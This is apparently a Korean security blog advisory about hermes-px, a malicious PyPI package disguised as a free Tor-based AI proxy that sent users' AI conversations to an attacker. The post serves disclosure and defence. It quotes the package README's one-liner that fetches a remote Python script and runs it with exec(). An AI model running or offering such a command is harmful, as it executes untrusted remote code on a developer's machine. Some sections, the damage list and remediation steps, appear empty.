
최근 파이썬 공식 패키지 저장소 PyPI에서 AI 프록시 도구로 위장해 백그라운드에서 사용자의 민감한 데이터를 은밀하게 탈취하는 악성 파이썬 패키지(hermes-px)가 발견되었습니다.
해당 패키지는 Tor 네트워크를 통해 AI 요청을 익명으로 처리해 주는 무료 프록시 도구를 표방했지만, 실제로는 사용자가 AI에 입력한 모든 대화 내용을 공격자 서버로 전송하는 정보 탈취형 악성 패키지였습니다.
API 키 없이 무료로 사용할 수 있다는 점을 내세워 AI 개발 도구를 찾는 개발자들을 주요 타깃으로 삼았습니다.
hermes-px 악성 패키지는 'EGen Labs'라는 가상의 회사가 개발한 제품으로 위장했습니다.
상세한 설치 안내, 코드 예제, OpenAI Python SDK 마이그레이션 가이드, RAG(Retrieval-Augmented Generation:검색 증강 생성) 파이프라인 구성 예시까지 갖춘 완성도 높은 문서를 제공했으며, API 구조도 OpenAI SDK와 동일하게 설계해 기존 개발자들이 별도 학습 없이 바로 사용할 수 있도록 했습니다.
🔎 참고하세요
RAG(Retrieval-Augmented Generation): AI가 답변을 생성할 때 외부 데이터를 검색해서 참조하도록 하는 기술입니다.

패키지 README 파일에는 사용자가 urllib.request와 exec()를 사용하여 GitHub URL에서 Python 스크립트를 직접 가져와 실행하는 방법을 안내하는 "대화형 학습 CLI(Interactive Learning CLI )" 기능도 포함되어 있었습니다.
python -c "import urllib.request; exec(urllib.request.urlopen('hxxps[:]//raw[.]githubusercontent[.]com/EGenLabs/hermes/main/demo/hermes_learn[.]py').read())"
이를 통해 공격자는 패키지를 새로 배포하지 않고도 추가 악성 코드를 피해 시스템에 실행할 수 있는 별도의 공격 채널을 확보해 두었습니다.
실제 공격은 다음과 같은 순서로 이루어집니다.
| 단계 | 내용 |
| 1단계 | 개발자가 PyPI에서 hermes-px를 설치하고 프로젝트에 통합 |
| 2단계 | 사용자의 AI 요청이 Tor를 통해 튀니지 대학교 내부 AI 시스템으로 무단 우회 |
| 3단계 | 대학 서버에서 생성된 AI 응답을 받아 제공사 흔적을 변조한 뒤 사용자에게 반환 |
| 4단계 | 사용자의 모든 대화 내용이 공격자 서버로 실시간 전송 |
[표 1] 공격 흐름


//Direct request bypasses the Tor session to avoid proxy overhead
hermes-px를 설치하고 사용한 개발자라면 다음과 같은 피해가 발생했을 수 있습니다.
hermes-px를 설치한 적이 있다면 즉시 아래 조치를 취하시기 바랍니다.
이번 악성 패키지 공격은 AI 개발 도구에 대한 수요를 겨냥한 공급망 공격이 얼마나 정교하게 설계될 수 있는지를 잘 보여주는 사례라 할 수 있습니다. 기술적 복잡성보다 사용자의 신뢰를 단계적으로 구축하는 방식으로 설계되었으며, 실제로 동작하는 AI 기능을 제공해 의심을 차단했다는 점이 특징적입니다.
특히 AI 서비스의 내부 시스템 프롬프트가 탈취되어 악성 패키지의 구성 요소로 재활용된 사실은, AI 자산 보호와 공급망 보안 관리의 중요성을 다시 한번 상기시켜 줍니다.
오픈소스 패키지를 도입할 때는 편리함보다 검증을 우선하는 습관이 필요합니다.
[참고]
https://cybersecuritynews.com/trojanized-pypi-ai-proxy-uses-stolen-claude-prompt/
https://research.jfrog.com/post/hermes-px-pypi/
| Axios NPM 패키지 공급망 공격 발생 (0) | 2026.04.01 |
|---|---|
| Windows 메모장 원격 코드 실행(RCE) 취약점 업데이트 권고(CVE-2026-20841) (0) | 2026.02.13 |
| AI 에이전트 확장 마켓플레이스 ClawHub, 대규모 공급망 공격 발생 (0) | 2026.02.12 |
| "지금 사무실인가요?"... 대표님 사칭 피싱 메일 주의! (0) | 2026.02.11 |
| 영상 픽셀 속 악성코드, '픽셀코드(PixelCode)' 공격기법 (0) | 2026.01.29 |
댓글 영역